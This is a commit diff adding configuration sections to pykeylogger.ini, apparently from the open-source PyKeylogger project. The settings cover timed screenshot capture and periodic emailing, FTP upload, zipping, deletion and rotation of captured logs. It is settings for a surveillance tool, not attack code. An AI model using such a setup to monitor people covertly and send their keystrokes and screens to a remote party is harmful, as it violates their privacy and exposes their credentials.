create the .ini and .val sections for the timed screenshotter
also some minor code corrections/cleanup in the screenshotter

--- a/pykeylogger.ini
+++ b/pykeylogger.ini
@@ -419,3 +419,188 @@ Enable Log Rotation = False
 # default: 4.0
 Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
 Log Rotation Interval = 4.0
+
+[Timed Screenshot Capture]
+
+[[General]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = TimedScreenshotFirstStage
+
+# default: True
+Enable Timed Screenshot Capture Tooltip = Enable the capture of a partial screenshot at every mouse click. This functionality grabs an area around the mouse pointer with every click (area size defined with the width and height settings in this panel).
+Enable Timed Screenshot Capture = True
+
+# default: detailedlog
+Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
+Log Subdirectory = timed_screenshots
+
+# default: logfile.txt
+Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Subdirectory".
+Log Filename = logfile.txt
+
+Screenshot Image Filename Tooltip = Specify filename pattern for the timed screenshot images. The following variables are interpreted:\n\n* "%time%" inserts a date/time string of the format "YYYYMMDD_HHMMSS_microsecond". This must be included to assure uniqueness of the filename.\n\nThe file extension is based on the 'Screenshot Image Format' setting, and should not be specified here.
+Screenshot Image Filename = %time%_screenshot
+
+# default: png
+Screenshot Image Format Tooltip = Specify the file format of the timed screenshot images. The following formats are supported: png, jpg, bmp, gif, pcx, ppm, pgm, pbm, tiff, xbm.
+Screenshot Image Format = png
+
+# default: 75
+Screenshot Image Quality Tooltip = Specify the image file quality of the timed screenshot images. This option only applies to the JPG file format. Specify a value from 1 to 100 (100 being completely uncompressed).
+Screenshot Image Quality = 75
+
+# default: 60
+Screenshot Interval Tooltip = Specify the time interval between screenshots, in SECONDS. Note that screenshot image files can be large, so you probably don't want them to be taken too frequently.
+Screenshot Interval = 60
+
+[[E-mail]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = EmailLogSender
+
+# default: False
+Enable E-mail Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
+Enable E-mail = False
+
+# default: True
+SMTP Needs Login Tooltip = Set to True if your SMTP server requires a login with username/password.
+SMTP Needs Login = True
+
+# default: yourusername
+SMTP Username Tooltip = Set to your username for the SMTP server (only needed if your SMTP server requires a login).
+SMTP Username = yourusername
+
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# Setting it here directly will not work.
+# default: yourpassword
+SMTP Password Tooltip = Set to your password (only needed if your SMTP server requires a password).
+SMTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=
+
+# default: smtp.gmail.com
+SMTP Server Tooltip = Set to the hostname of your SMTP server.
+SMTP Server = smtp.gmail.com
+
+# default: 587
+SMTP Port Tooltip = Set to the port of your SMTP server (Standard ports are: port 25 for no encryption; port 587 for TLS; port 465 for SSL)
+SMTP Port = 587
+
+# default: True
+SMTP Use TLS Tooltip = Set this to True to enable TLS encryption (a good idea if your server supports it).
+SMTP Use TLS = True
+
+# default: yourfromaddress@host.com
+E-mail From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
+E-mail From = yourfromaddress@host.com
+
+# default: yourtoaddress@host.com
+E-mail To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
+E-mail To = yourtoaddress@host.com
+
+# default: Automatic Logfile Email
+E-mail Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
+E-mail Subject = Automatic Logfile Email
+
+# default: "Please see attached zipfile."
+E-mail Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
+E-mail Message Body = Please see attached zipfile.
+
+# default: 4.0
+E-mail Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
+E-mail Interval = 4.0
+
+[[Zip]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogZipper
+
+# default: False
+Enable Zip Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives, and deletion of files that have been zipped. \n\nIf you plan on using automatic log emailing, best not to turn this on, since log emailer will take care of it. \n\nIf you plan on leaving the logfiles on local system only, you can turn this on to reduce disk usage.
+Enable Zip = False
+
+# default: 4.0
+Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
+Zip Interval = 4.0
+
+[[FTP]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = FTPLogUploader
+
+# default: False
+Enable FTP Tooltip = Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP.
+Enable FTP = False
+
+# default: your.FTP.server
+FTP Server Tooltip = Set to the hostname of your FTP server.
+FTP Server = your.FTP.server
+
+# default: 21
+FTP Port Tooltip = Set to the port number of your FTP server (most FTP servers run on port 21).
+FTP Port = 21
+
+# default: anonymous
+FTP Username Tooltip = Set to your username on the target FTP server.
+FTP Username = anonymous
+
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# Setting it here directly will not work.
+# default: anonymous@
+FTP Password Tooltip = Set to your password on the target FTP server.
+FTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=
+
+# default: pykeylogger
+FTP Upload Directory Tooltip = Set to the directory on the server where you would like to upload (relative or full path accepted).
+FTP Upload Directory = pykeylogger
+
+# default: True
+FTP Passive Mode Tooltip = Set to True to enable passive mode file transfer (recommended).
+FTP Passive Mode = True
+
+# default: 4.0
+FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
+FTP Interval = 4.0
+
+[[Old Log Deletion]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = OldLogDeleter
+
+# default: False
+Enable Old Log Deletion Tooltip = Set to True to enable automatic deletion of old logs.
+Enable Old Log Deletion = False
+
+# default: 2.0
+Max Log Age Tooltip = Set to the maximum age of the logs that you want to keep, in DAYS. Logs older than this will be deleted.
+Max Log Age = 2.0
+
+# default: 2.0
+Age Check Interval Tooltip = Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
+Age Check Interval = 2.0
+
+
+[[Log Flush]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogFlusher
+
+# default: True
+Enable Log Flush Tooltip = Enable logfile buffer autoflush. Recommended, to reduce potential for data loss in case of crash.
+Enable Log Flush = True
+
+# default: 120
+Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
+Flush Interval = 120.0
+
+[[Log Rotation]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogRotator
+
+# default: False
+Enable Log Rotation Tooltip = Enable log rotation. Log file will be renamed to a dated filename, and a fresh one will be started, with each rotation event.\n\nIf you plan on using automatic log emailing, best not to turn this on, since log emailer will take care of it. \n\nIf you plan on leaving the logfiles on local system only, and enable whe zipper, leave this off as well, since the zipper will take care of it. \n\nIn other words, it's best to only turn this on if you don't want emailing and don't want zipping.
+Enable Log Rotation = False
+
+# default: 4.0
+Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
+Log Rotation Interval = 4.0
